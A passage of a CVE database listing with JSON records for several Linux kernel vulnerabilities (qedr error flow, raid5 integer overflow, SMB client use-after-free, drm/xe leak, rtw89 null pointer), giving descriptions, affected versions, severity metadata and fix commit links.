          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/qedr: Fix qedr_create_user_qp error flow\n\nAvoid the following warning by making sure to free the allocated\nresources in case that qedr_init_user_queue() fail.\n\n-----------[ cut here ]-----------\nWARNING: CPU: 0 PID: 143192 at drivers/infiniband/core/rdma_core.c:874 uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\nModules linked in: tls target_core_user uio target_core_pscsi target_core_file target_core_iblock ib_srpt ib_srp scsi_transport_srp nfsd nfs_acl rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs 8021q garp mrp stp llc ext4 mbcache jbd2 opa_vnic ib_umad ib_ipoib sunrpc rdma_ucm ib_isert iscsi_target_mod target_core_mod ib_iser libiscsi scsi_transport_iscsi rdma_cm iw_cm ib_cm hfi1 intel_rapl_msr intel_rapl_common mgag200 qedr sb_edac drm_shmem_helper rdmavt x86_pkg_temp_thermal drm_kms_helper intel_powerclamp ib_uverbs coretemp i2c_algo_bit kvm_intel dell_wmi_descriptor ipmi_ssif sparse_keymap kvm ib_core rfkill syscopyarea sysfillrect video sysimgblt irqbypass ipmi_si ipmi_devintf fb_sys_fops rapl iTCO_wdt mxm_wmi iTCO_vendor_support intel_cstate pcspkr dcdbas intel_uncore ipmi_msghandler lpc_ich acpi_power_meter mei_me mei fuse drm xfs libcrc32c qede sd_mod ahci libahci t10_pi sg crct10dif_pclmul crc32_pclmul crc32c_intel qed libata tg3\nghash_clmulni_intel megaraid_sas crc8 wmi [last unloaded: ib_srpt]\nCPU: 0 PID: 143192 Comm: fi_rdm_tagged_p Kdump: loaded Not tainted 5.14.0-408.el9.x86_64 #1\nHardware name: Dell Inc. PowerEdge R430/03XKDV, BIOS 2.14.0 01/25/2022\nRIP: 0010:uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\nCode: 5d 41 5c 41 5d 41 5e e9 0f 26 1b dd 48 89 df e8 67 6a ff ff 49 8b 86 10 01 00 00 48 85 c0 74 9c 4c 89 e7 e8 83 c0 cb dd eb 92 \u003c0f\u003e 0b eb be 0f 0b be 04 00 00 00 48 89 df e8 8e f5 ff ff e9 6d ff\nRSP: 0018:ffffb7c6cadfbc60 EFLAGS: 00010286\nRAX: ffff8f0889ee3f60 RBX: ffff8f088c1a5200 RCX: 00000000802a0016\nRDX: 00000000802a0017 RSI: 0000000000000001 RDI: ffff8f0880042600\nRBP: 0000000000000001 R08: 0000000000000001 R09: 0000000000000000\nR10: ffff8f11fffd5000 R11: 0000000000039000 R12: ffff8f0d5b36cd80\nR13: ffff8f088c1a5250 R14: ffff8f1206d91000 R15: 0000000000000000\nFS: 0000000000000000(0000) GS:ffff8f11d7c00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000147069200e20 CR3: 00000001c7210002 CR4: 00000000001706f0\nCall Trace:\n\u003cTASK\u003e\n? show_trace_log_lvl+0x1c4/0x2df\n? show_trace_log_lvl+0x1c4/0x2df\n? ib_uverbs_close+0x1f/0xb0 [ib_uverbs]\n? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\n? __warn+0x81/0x110\n? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\n? report_bug+0x10a/0x140\n? handle_bug+0x3c/0x70\n? exc_invalid_op+0x14/0x70\n? asm_exc_invalid_op+0x16/0x20\n? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs]\nib_uverbs_close+0x1f/0xb0 [ib_uverbs]\n__fput+0x94/0x250\ntask_work_run+0x5c/0x90\ndo_exit+0x270/0x4a0\ndo_group_exit+0x2d/0x90\nget_signal+0x87c/0x8c0\narch_do_signal_or_restart+0x25/0x100\n? ib_uverbs_ioctl+0xc2/0x110 [ib_uverbs]\nexit_to_user_mode_loop+0x9c/0x130\nexit_to_user_mode_prepare+0xb6/0x100\nsyscall_exit_to_user_mode+0x12/0x40\ndo_syscall_64+0x69/0x90\n? syscall_exit_work+0x103/0x130\n? syscall_exit_to_user_mode+0x22/0x40\n? do_syscall_64+0x69/0x90\n? syscall_exit_work+0x103/0x130\n? syscall_exit_to_user_mode+0x22/0x40\n? do_syscall_64+0x69/0x90\n? do_syscall_64+0x69/0x90\n? common_interrupt+0x43/0xa0\nentry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x1470abe3ec6b\nCode: Unable to access opcode bytes at RIP 0x1470abe3ec41.\nRSP: 002b:00007fff13ce9108 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: fffffffffffffffc RBX: 00007fff13ce9218 RCX: 00001470abe3ec6b\nRDX: 00007fff13ce9200 RSI: 00000000c0181b01 RDI: 0000000000000004\nRBP: 00007fff13ce91e0 R08: 0000558d9655da10 R09: 0000558d9655dd00\nR10: 00007fff13ce95c0 R11: 0000000000000246 R12: 00007fff13ce9358\nR13: 0000000000000013 R14: 0000558d9655db50 R15: 00007fff13ce9470\n\u003c/TASK\u003e\n--[ end trace 888a9b92e04c5c97 ]--"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:55:29.287Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5639414a52a29336ffa1ede80a67c6d927acbc5a"
        },
        {
          "url": "https://git.kernel.org/stable/c/135e5465fefa463c5ec93c4eede48b9fedac894a"
        },
        {
          "url": "https://git.kernel.org/stable/c/7f31a244c753aacf40b71d01f03ca6742f81bbbc"
        },
        {
          "url": "https://git.kernel.org/stable/c/95175dda017cd4982cd47960536fa1de003d3298"
        },
        {
          "url": "https://git.kernel.org/stable/c/bab8875c06ebda5e01c5c4cab30022aed85c14e6"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ba4e6d5863c53e937f49932dee0ecb004c65928"
        }
      ],
      "title": "RDMA/qedr: Fix qedr_create_user_qp error flow",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26743",
    "datePublished": "2024-04-03T17:00:32.634Z",
    "dateReserved": "2024-02-19T14:20:24.167Z",
    "dateUpdated": "2025-05-04T08:55:29.287Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-23307 (GCVE-0-2024-23307)

Vulnerability from cvelistv5 – Published: 2024-01-25 06:59 – Updated: 2025-06-17 21:19

Title

Integer overflow in raid5_cache_count in Linux kernel

Summary

Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow.

Severity ?

4.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-190 - Integer Overflow or Wraparound

Assigner

Anolis

References

URL

Tags

https://bugzilla.openanolis.cn/show_bug.cgi?id=7975

Impacted products

	Vendor	Product	Version
	Linux	Linux kernel	Affected: v4.1-rc1 , < v6.8-rc1 (custom)

Credits

Gui-Dong Han <2045gemini@gmail.com>

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T22:59:32.237Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=7975"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-23307",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-01-25T20:01:15.650200Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-06-17T21:19:30.512Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://mirrors.openanolis.cn/anolis/",
          "defaultStatus": "unaffected",
          "modules": [
            "md",
            "raid",
            "raid5"
          ],
          "packageName": "kernel",
          "platforms": [
            "Linux",
            "x86",
            "ARM"
          ],
          "product": "Linux kernel",
          "programFiles": [
            "https://gitee.com/anolis/cloud-kernel/blob/devel-4.19/drivers/md/raid5.c"
          ],
          "repo": "https://gitee.com/anolis/cloud-kernel.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "v6.8-rc1",
              "status": "affected",
              "version": "v4.1-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Gui-Dong Han \u003c2045gemini@gmail.com\u003e"
        }
      ],
      "datePublic": "2024-01-19T02:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow."
            }
          ],
          "value": "Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-92",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-92 Forced Integer Overflow"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-190",
              "description": "CWE-190 Integer Overflow or Wraparound",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-25T06:59:37.190Z",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=7975"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://patchwork.kernel.org/project/linux-raid/patch/20240112071017.16313-1-2045gemini@gmail.com/\"\u003ehttps://patchwork.kernel.org/project/linux-raid/patch/20240112071017.16313-1-2045gemini@gmail.com/\u003c/a\u003e"
            }
          ],
          "value": " https://patchwork.kernel.org/project/linux-raid/patch/20240112071017.16313-1-2045gemini@gmail.com/ https://patchwork.kernel.org/project/linux-raid/patch/20240112071017.16313-1-2045gemini@gmail.com/ "
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "Integer overflow in raid5_cache_count in Linux kernel",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2024-23307",
    "datePublished": "2024-01-25T06:59:37.190Z",
    "dateReserved": "2024-01-15T09:44:45.516Z",
    "dateUpdated": "2025-06-17T21:19:30.512Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35861 (GCVE-0-2024-35861)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2026-01-05 10:35

Title

smb: client: fix potential UAF in cifs_signal_cifsd_for_reconnect()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF in cifs_signal_cifsd_for_reconnect() Skip sessions that are being teared down (status == SES_EXITING) to avoid UAF.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7e8360ac8774e19b0…
	https://git.kernel.org/stable/c/2cfff21732132e363…
	https://git.kernel.org/stable/c/f9a96a7ad1e8d25dc…
	https://git.kernel.org/stable/c/e0e50401cc3921c9e…

Impacted products

Vendor

Product

Version

Linux

Affected: dca65818c80cf06e0f08ba2cf94060a5236e73c2 , < 7e8360ac8774e19b0b25f44fff84a105bb2417e4 (git)
Affected: dca65818c80cf06e0f08ba2cf94060a5236e73c2 , < 2cfff21732132e363b4cc275d63ea98f1af726c1 (git)
Affected: dca65818c80cf06e0f08ba2cf94060a5236e73c2 , < f9a96a7ad1e8d25dc6662bc7552e0752de74a20d (git)
Affected: dca65818c80cf06e0f08ba2cf94060a5236e73c2 , < e0e50401cc3921c9eaf1b0e667db174519ea939f (git)
Affected: dd9ccff8c8980bf9ea7f25e83eeb28154f902920 (git)

Linux

Affected: 5.18
Unaffected: 0 , < 5.18 (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.592Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e8360ac8774e19b0b25f44fff84a105bb2417e4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2cfff21732132e363b4cc275d63ea98f1af726c1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f9a96a7ad1e8d25dc6662bc7552e0752de74a20d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e0e50401cc3921c9eaf1b0e667db174519ea939f"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35861",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:41:30.759863Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:17.503Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/connect.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7e8360ac8774e19b0b25f44fff84a105bb2417e4",
              "status": "affected",
              "version": "dca65818c80cf06e0f08ba2cf94060a5236e73c2",
              "versionType": "git"
            },
            {
              "lessThan": "2cfff21732132e363b4cc275d63ea98f1af726c1",
              "status": "affected",
              "version": "dca65818c80cf06e0f08ba2cf94060a5236e73c2",
              "versionType": "git"
            },
            {
              "lessThan": "f9a96a7ad1e8d25dc6662bc7552e0752de74a20d",
              "status": "affected",
              "version": "dca65818c80cf06e0f08ba2cf94060a5236e73c2",
              "versionType": "git"
            },
            {
              "lessThan": "e0e50401cc3921c9eaf1b0e667db174519ea939f",
              "status": "affected",
              "version": "dca65818c80cf06e0f08ba2cf94060a5236e73c2",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "dd9ccff8c8980bf9ea7f25e83eeb28154f902920",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/connect.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.18"
            },
            {
              "lessThan": "5.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.17.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in cifs_signal_cifsd_for_reconnect()\n\nSkip sessions that are being teared down (status == SES_EXITING) to\navoid UAF."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:26.900Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7e8360ac8774e19b0b25f44fff84a105bb2417e4"
        },
        {
          "url": "https://git.kernel.org/stable/c/2cfff21732132e363b4cc275d63ea98f1af726c1"
        },
        {
          "url": "https://git.kernel.org/stable/c/f9a96a7ad1e8d25dc6662bc7552e0752de74a20d"
        },
        {
          "url": "https://git.kernel.org/stable/c/e0e50401cc3921c9eaf1b0e667db174519ea939f"
        }
      ],
      "title": "smb: client: fix potential UAF in cifs_signal_cifsd_for_reconnect()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35861",
    "datePublished": "2024-05-19T08:34:20.364Z",
    "dateReserved": "2024-05-17T13:50:33.107Z",
    "dateUpdated": "2026-01-05T10:35:26.900Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26985 (GCVE-0-2024-26985)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:27 – Updated: 2025-11-04 17:15

Title

drm/xe: Fix bo leak in intel_fb_bo_framebuffer_init

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix bo leak in intel_fb_bo_framebuffer_init Add a unreference bo in the error path, to prevent leaking a bo ref. Return 0 on success to clarify the success path. (cherry picked from commit a2f3d731be3893e730417ae3190760fcaffdf549)

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7d8ac0942c312abda…
	https://git.kernel.org/stable/c/652ead9b746a63e4e…

Impacted products

Vendor

Product

Version

Linux

Affected: 44e694958b95395bd1c41508c88c8ca141bf9bd7 , < 7d8ac0942c312abda43b407eff72d31747a7b472 (git)
Affected: 44e694958b95395bd1c41508c88c8ca141bf9bd7 , < 652ead9b746a63e4e79d7ad66d3edf0a8a5b0c2f (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:15:15.152Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d8ac0942c312abda43b407eff72d31747a7b472"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/652ead9b746a63e4e79d7ad66d3edf0a8a5b0c2f"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26985",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:44:59.759001Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:41.533Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/xe/display/intel_fb_bo.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7d8ac0942c312abda43b407eff72d31747a7b472",
              "status": "affected",
              "version": "44e694958b95395bd1c41508c88c8ca141bf9bd7",
              "versionType": "git"
            },
            {
              "lessThan": "652ead9b746a63e4e79d7ad66d3edf0a8a5b0c2f",
              "status": "affected",
              "version": "44e694958b95395bd1c41508c88c8ca141bf9bd7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/xe/display/intel_fb_bo.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Fix bo leak in intel_fb_bo_framebuffer_init\n\nAdd a unreference bo in the error path, to prevent leaking a bo ref.\n\nReturn 0 on success to clarify the success path.\n\n(cherry picked from commit a2f3d731be3893e730417ae3190760fcaffdf549)"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:30.397Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7d8ac0942c312abda43b407eff72d31747a7b472"
        },
        {
          "url": "https://git.kernel.org/stable/c/652ead9b746a63e4e79d7ad66d3edf0a8a5b0c2f"
        }
      ],
      "title": "drm/xe: Fix bo leak in intel_fb_bo_framebuffer_init",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26985",
    "datePublished": "2024-05-01T05:27:25.121Z",
    "dateReserved": "2024-02-19T14:20:24.204Z",
    "dateUpdated": "2025-11-04T17:15:15.152Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35946 (GCVE-0-2024-35946)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-05-04 09:08

Title

wifi: rtw89: fix null pointer access when abort scan

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: fix null pointer access when abort scan During cancel scan we might use vif that weren't scanning. Fix this by using the actual scanning vif.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b34d64e9aa5505e3c…
	https://git.kernel.org/stable/c/4f11c741908dab7dd…
	https://git.kernel.org/stable/c/7e11a2966f51695c0…

Impacted products

Vendor

Product

Version

Linux

Affected: e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd , < b34d64e9aa5505e3c84570aed5c757f1839573e8 (git)
Affected: e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd , < 4f11c741908dab7dd48fa5a986b210d4fc74ca8d (git)
Affected: e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd , < 7e11a2966f51695c0af0b1f976a32d64dee243b2 (git)

Linux

Affected: 5.16
Unaffected: 0 , < 5.16 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35946",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:06:33.157936Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:38.762Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.936Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b34d64e9aa5505e3c84570aed5c757f1839573e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f11c741908dab7dd48fa5a986b210d4fc74ca8d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e11a2966f51695c0af0b1f976a32d64dee243b2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/realtek/rtw89/mac80211.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b34d64e9aa5505e3c84570aed5c757f1839573e8",
              "status": "affected",
              "version": "e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd",
              "versionType": "git"
            },
            {
              "lessThan": "4f11c741908dab7dd48fa5a986b210d4fc74ca8d",
              "status": "affected",
              "version": "e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd",
              "versionType": "git"
            },
            {
              "lessThan": "7e11a2966f51695c0af0b1f976a32d64dee243b2",
              "status": "affected",
              "version": "e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/realtek/rtw89/mac80211.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
